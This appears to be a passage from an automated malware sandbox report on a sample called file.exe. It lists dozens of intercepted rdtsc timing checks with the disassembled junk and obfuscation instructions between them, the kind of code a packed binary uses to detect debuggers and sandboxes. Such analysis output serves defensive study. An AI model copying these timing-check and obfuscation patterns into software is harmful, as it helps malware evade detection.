        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 752ACA second address: 752ACE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 752ACE second address: 752ADA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 752ADA second address: 752ADE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 752ADE second address: 752B05 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 push eax 0x00000008 push edx 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d pop eax 0x0000000e pop edx 0x0000000f jmp 00007FA1CCF9D8C8h 0x00000014 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 753519 second address: 75351F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 75351F second address: 75352F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA1CCF9D8BCh 0x00000009 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7536B9 second address: 7536BD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7498C4 second address: 7498CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 757294 second address: 757298 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 757298 second address: 7572A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7572A0 second address: 7572A5 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7598B2 second address: 7598BC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007FA1CCF9D8B6h 0x0000000a rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7598BC second address: 7598DD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA1CCCD2155h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [eax] 0x0000000d pushad 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7598DD second address: 7598FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA1CCF9D8C8h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7598FE second address: 759902 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 759902 second address: 759917 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp+04h], eax 0x0000000b je 00007FA1CCF9D8D2h 0x00000011 push eax 0x00000012 push edx 0x00000013 push edi 0x00000014 pop edi 0x00000015 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 759A21 second address: 759A25 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 759A25 second address: 759A2B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 759A2B second address: 759A32 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 759A32 second address: 759A53 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FA1CCF9D8C7h 0x0000000f rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 71C1C7 second address: 71C1CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 71C1CD second address: 71C214 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA1CCF9D8BDh 0x00000009 popad 0x0000000a pop edi 0x0000000b pushad 0x0000000c jl 00007FA1CCF9D8CFh 0x00000012 jmp 00007FA1CCF9D8C9h 0x00000017 pushad 0x00000018 jne 00007FA1CCF9D8B6h 0x0000001e push ecx 0x0000001f pop ecx 0x00000020 popad 0x00000021 push eax 0x00000022 push edx 0x00000023 jp 00007FA1CCF9D8B6h 0x00000029 pushad 0x0000002a popad 0x0000002b rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7298D7 second address: 7298E7 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FA1CCCD2146h 0x00000008 push esi 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7298E7 second address: 7298F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007FA1CCF9D8B6h 0x0000000a rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7601D5 second address: 7601FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FA1CCCD2146h 0x0000000a pop ebx 0x0000000b pushad 0x0000000c jmp 00007FA1CCCD2152h 0x00000011 jno 00007FA1CCCD2146h 0x00000017 push ebx 0x00000018 pop ebx 0x00000019 popad 0x0000001a rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7601FC second address: 760201 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 760354 second address: 76036B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007FA1CCCD2146h 0x0000000a popad 0x0000000b jmp 00007FA1CCCD214Ch 0x00000010 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 76036B second address: 760375 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FA1CCF9D8C2h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 760375 second address: 76038B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007FA1CCCD2146h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push edi 0x0000000f jnp 00007FA1CCCD2146h 0x00000015 pop edi 0x00000016 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 76038B second address: 760390 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7604EF second address: 7604F3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 760936 second address: 760955 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA1CCF9D8C6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 760955 second address: 760959 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 762BEE second address: 762BF4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 763022 second address: 763028 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 763028 second address: 76302C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 76365F second address: 763675 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FA1CCCD214Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 763675 second address: 763679 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 763990 second address: 763996 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 763996 second address: 7639A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 js 00007FA1CCF9D8BCh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 763B96 second address: 763BA9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA1CCCD214Eh 0x00000009 popad 0x0000000a rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 763BA9 second address: 763BBA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA1CCF9D8BDh 0x00000009 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 763BBA second address: 763BCC instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FA1CCCD2146h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push esi 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 763BCC second address: 763BD1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 763BD1 second address: 763BDB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007FA1CCCD2146h 0x0000000a rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 763BDB second address: 763C18 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FA1CCF9D8B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d push 00000000h 0x0000000f push ebx 0x00000010 call 00007FA1CCF9D8B8h 0x00000015 pop ebx 0x00000016 mov dword ptr [esp+04h], ebx 0x0000001a add dword ptr [esp+04h], 00000016h 0x00000022 inc ebx 0x00000023 push ebx 0x00000024 ret 0x00000025 pop ebx 0x00000026 ret 0x00000027 pushad 0x00000028 mov ax, E592h 0x0000002c movzx ecx, dx 0x0000002f popad 0x00000030 movsx esi, dx 0x00000033 push eax 0x00000034 pushad 0x00000035 push eax 0x00000036 push edx 0x00000037 push eax 0x00000038 push edx 0x00000039 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 763C18 second address: 763C1C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 764BF5 second address: 764BF9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 764BF9 second address: 764BFF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 764BFF second address: 764C05 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 765CA2 second address: 765CB8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA1CCCD214Dh 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 765CB8 second address: 765CBC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 765CBC second address: 765CC0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 765CC0 second address: 765CD5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 jno 00007FA1CCF9D8B8h 0x0000000f push eax 0x00000010 push edx 0x00000011 push edx 0x00000012 pop edx 0x00000013 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 76673E second address: 7667C3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA1CCCD214Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ecx 0x0000000a push eax 0x0000000b jmp 00007FA1CCCD2150h 0x00000010 nop 0x00000011 push 00000000h 0x00000013 push ecx 0x00000014 call 00007FA1CCCD2148h 0x00000019 pop ecx 0x0000001a mov dword ptr [esp+04h], ecx 0x0000001e add dword ptr [esp+04h], 0000001Bh 0x00000026 inc ecx 0x00000027 push ecx 0x00000028 ret 0x00000029 pop ecx 0x0000002a ret 0x0000002b mov di, dx 0x0000002e push 00000000h 0x00000030 push 00000000h 0x00000032 push edi 0x00000033 call 00007FA1CCCD2148h 0x00000038 pop edi 0x00000039 mov dword ptr [esp+04h], edi 0x0000003d add dword ptr [esp+04h], 00000018h 0x00000045 inc edi 0x00000046 push edi 0x00000047 ret 0x00000048 pop edi 0x00000049 ret 0x0000004a or di, 93A0h 0x0000004f sub dword ptr [ebp+1244A315h], ecx 0x00000055 push 00000000h 0x00000057 jnl 00007FA1CCCD2146h 0x0000005d push eax 0x0000005e pushad 0x0000005f push edx 0x00000060 push eax 0x00000061 push edx 0x00000062 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 766504 second address: 76651E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA1CCF9D8C6h 0x00000009 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7671ED second address: 767215 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jmp 00007FA1CCCD2154h 0x0000000a popad 0x0000000b push eax 0x0000000c pushad 0x0000000d jp 00007FA1CCCD2148h 0x00000013 push edx 0x00000014 pop edx 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 767215 second address: 767219 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 767219 second address: 76721D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 767D9A second address: 767E18 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA1CCF9D8C7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a mov dword ptr [esp], eax 0x0000000d sub dword ptr [ebp+122D1B70h], ecx 0x00000013 push 00000000h 0x00000015 jo 00007FA1CCF9D8BBh 0x0000001b sbb si, DA6Bh 0x00000020 push 00000000h 0x00000022 push 00000000h 0x00000024 push edi 0x00000025 call 00007FA1CCF9D8B8h 0x0000002a pop edi 0x0000002b mov dword ptr [esp+04h], edi 0x0000002f add dword ptr [esp+04h], 0000001Ah 0x00000037 inc edi 0x00000038 push edi 0x00000039 ret 0x0000003a pop edi 0x0000003b ret 0x0000003c jl 00007FA1CCF9D8B7h 0x00000042 clc 0x00000043 xchg eax, ebx 0x00000044 jns 00007FA1CCF9D8C0h 0x0000004a push eax 0x0000004b pushad 0x0000004c pushad 0x0000004d push edx 0x0000004e pop edx 0x0000004f push ecx 0x00000050 pop ecx 0x00000051 popad 0x00000052 jc 00007FA1CCF9D8BCh 0x00000058 push eax 0x00000059 push edx 0x0000005a rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7688B8 second address: 768961 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA1CCCD2152h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edi 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f push ebx 0x00000010 call 00007FA1CCCD2148h 0x00000015 pop ebx 0x00000016 mov dword ptr [esp+04h], ebx 0x0000001a add dword ptr [esp+04h], 00000018h 0x00000022 inc ebx 0x00000023 push ebx 0x00000024 ret 0x00000025 pop ebx 0x00000026 ret 0x00000027 movzx esi, si 0x0000002a push 00000000h 0x0000002c push 00000000h 0x0000002e push edx 0x0000002f call 00007FA1CCCD2148h 0x00000034 pop edx 0x00000035 mov dword ptr [esp+04h], edx 0x00000039 add dword ptr [esp+04h], 0000001Bh 0x00000041 inc edx 0x00000042 push edx 0x00000043 ret 0x00000044 pop edx 0x00000045 ret 0x00000046 mov di, si 0x00000049 push 00000000h 0x0000004b pushad 0x0000004c call 00007FA1CCCD214Fh 0x00000051 pushad 0x00000052 popad 0x00000053 pop edx 0x00000054 sub dword ptr [ebp+122D289Ch], ecx 0x0000005a popad 0x0000005b xchg eax, ebx 0x0000005c jnl 00007FA1CCCD2161h 0x00000062 push eax 0x00000063 pushad 0x00000064 push eax 0x00000065 push edx 0x00000066 push esi 0x00000067 pop esi 0x00000068 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 76C28B second address: 76C291 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 76E0EB second address: 76E109 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA1CCCD214Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a push eax 0x0000000b push esi 0x0000000c push eax 0x0000000d push edx 0x0000000e jc 00007FA1CCCD2146h 0x00000014 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 76E109 second address: 76E176 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push edx 0x0000000b call 00007FA1CCF9D8B8h 0x00000010 pop edx 0x00000011 mov dword ptr [esp+04h], edx 0x00000015 add dword ptr [esp+04h], 0000001Ch 0x0000001d inc edx 0x0000001e push edx 0x0000001f ret 0x00000020 pop edx 0x00000021 ret 0x00000022 mov dword ptr [ebp+122D2974h], ecx 0x00000028 or dword ptr [ebp+122D3271h], eax 0x0000002e mov dword ptr [ebp+122D179Bh], eax 0x00000034 push 00000000h 0x00000036 xor bh, FFFFFFD1h 0x00000039 push 00000000h 0x0000003b push 00000000h 0x0000003d push edi 0x0000003e call 00007FA1CCF9D8B8h 0x00000043 pop edi 0x00000044 mov dword ptr [esp+04h], edi 0x00000048 add dword ptr [esp+04h], 0000001Ah 0x00000050 inc edi 0x00000051 push edi 0x00000052 ret 0x00000053 pop edi 0x00000054 ret 0x00000055 xchg eax, esi 0x00000056 push ebx 0x00000057 push eax 0x00000058 push edx 0x00000059 push eax 0x0000005a push edx 0x0000005b rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 76E176 second address: 76E17A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 76E17A second address: 76E194 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA1CCF9D8C0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebx 0x0000000a push eax 0x0000000b pushad 0x0000000c push ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 76EEF3 second address: 76EF7E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA1CCCD214Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c push 00000000h 0x0000000e push ecx 0x0000000f call 00007FA1CCCD2148h 0x00000014 pop ecx 0x00000015 mov dword ptr [esp+04h], ecx 0x00000019 add dword ptr [esp+04h], 00000017h 0x00000021 inc ecx 0x00000022 push ecx 0x00000023 ret 0x00000024 pop ecx 0x00000025 ret 0x00000026 movzx ebx, bx 0x00000029 mov edi, 5D20CE31h 0x0000002e push 00000000h 0x00000030 push 00000000h 0x00000032 push ebx 0x00000033 call 00007FA1CCCD2148h 0x00000038 pop ebx 0x00000039 mov dword ptr [esp+04h], ebx 0x0000003d add dword ptr [esp+04h], 0000001Ch 0x00000045 inc ebx 0x00000046 push ebx 0x00000047 ret 0x00000048 pop ebx 0x00000049 ret 0x0000004a push 00000000h 0x0000004c push 00000000h 0x0000004e push ecx 0x0000004f call 00007FA1CCCD2148h 0x00000054 pop ecx 0x00000055 mov dword ptr [esp+04h], ecx 0x00000059 add dword ptr [esp+04h], 0000001Ah 0x00000061 inc ecx 0x00000062 push ecx 0x00000063 ret 0x00000064 pop ecx 0x00000065 ret 0x00000066 push eax 0x00000067 push eax 0x00000068 pushad 0x00000069 push eax 0x0000006a push edx 0x0000006b rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 76E2F8 second address: 76E30E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA1CCF9D8C2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 76FFB9 second address: 770009 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FA1CCCD214Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f push ebp 0x00000010 call 00007FA1CCCD2148h 0x00000015 pop ebp 0x00000016 mov dword ptr [esp+04h], ebp 0x0000001a add dword ptr [esp+04h], 00000015h 0x00000022 inc ebp 0x00000023 push ebp 0x00000024 ret 0x00000025 pop ebp 0x00000026 ret 0x00000027 mov di, 2E7Ch 0x0000002b push 00000000h 0x0000002d push 00000000h 0x0000002f pushad 0x00000030 mov esi, dword ptr [ebp+122D3560h] 0x00000036 mov ah, 0Bh 0x00000038 popad 0x00000039 push eax 0x0000003a pushad 0x0000003b jnc 00007FA1CCCD2148h 0x00000041 push eax 0x00000042 push edx 0x00000043 push edi 0x00000044 pop edi 0x00000045 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 76F208 second address: 76F20C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 770FCF second address: 770FD3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 770FD3 second address: 771012 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FA1CCF9D8BBh 0x00000008 jmp 00007FA1CCF9D8C3h 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 pushad 0x00000012 jmp 00007FA1CCF9D8C6h 0x00000017 push ebx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 773411 second address: 773490 instructions: 0x00000000 rdtsc 0x00000002 js 00007FA1CCCD2146h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ecx 0x0000000b pushad 0x0000000c popad 0x0000000d pop ecx 0x0000000e popad 0x0000000f mov dword ptr [esp], eax 0x00000012 push 00000000h 0x00000014 push esi 0x00000015 call 00007FA1CCCD2148h 0x0000001a pop esi 0x0000001b mov dword ptr [esp+04h], esi 0x0000001f add dword ptr [esp+04h], 00000018h 0x00000027 inc esi 0x00000028 push esi 0x00000029 ret 0x0000002a pop esi 0x0000002b ret 0x0000002c call 00007FA1CCCD2154h 0x00000031 call 00007FA1CCCD2155h 0x00000036 add edi, dword ptr [ebp+122D2856h] 0x0000003c pop edi 0x0000003d pop edi 0x0000003e push 00000000h 0x00000040 pushad 0x00000041 stc 0x00000042 mov edx, dword ptr [ebp+122D1889h] 0x00000048 popad 0x00000049 push 00000000h 0x0000004b push eax 0x0000004c push edx 0x0000004d stc 0x0000004e pop edi 0x0000004f pop edi 0x00000050 push eax 0x00000051 pushad 0x00000052 push ebx 0x00000053 pushad 0x00000054 popad 0x00000055 pop ebx 0x00000056 push eax 0x00000057 push edx 0x00000058 push edi 0x00000059 pop edi 0x0000005a rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 775359 second address: 77535D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 77535D second address: 775395 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FA1CCCD2146h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov dword ptr [esp], eax 0x0000000e js 00007FA1CCCD2148h 0x00000014 mov ebx, eax 0x00000016 push 00000000h 0x00000018 or dword ptr [ebp+122D3423h], edx 0x0000001e push 00000000h 0x00000020 mov dword ptr [ebp+122D2945h], ecx 0x00000026 xchg eax, esi 0x00000027 pushad 0x00000028 jc 00007FA1CCCD214Ch 0x0000002e je 00007FA1CCCD2146h 0x00000034 push eax 0x00000035 push edx 0x00000036 pushad 0x00000037 popad 0x00000038 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7770FD second address: 777103 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 77919A second address: 7791A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
